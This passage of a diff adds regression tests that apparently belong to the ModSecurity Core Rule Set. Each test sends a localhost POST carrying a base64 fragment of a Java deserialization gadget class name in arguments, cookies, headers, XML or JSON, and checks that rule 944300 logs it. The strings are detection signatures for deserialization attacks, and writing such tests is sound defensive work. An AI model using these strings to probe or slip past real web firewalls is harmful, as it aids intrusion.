944300-287 + desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-288 + desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-289 + desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-290 + desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-291 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-292 + desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-293 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-294 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-295 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-296 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-297 + desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-298 + desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-299 + desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-300 + desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-301 + desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-302 + desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-303 + desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-304 + desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-305 + desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-306 + desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-307 + desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-308 + desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-309 + desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-310 + desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-311 + desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-312 + desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-313 + desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-314 + desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-315 + desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-316 + desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-317 + desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-318 + desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-319 + desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-320 + desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-321 + desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-322 + desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-323 + desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-324 + desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-325 + desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-326 + desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-327 + desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-328 + desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-329 + desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/base_positive_rules.py 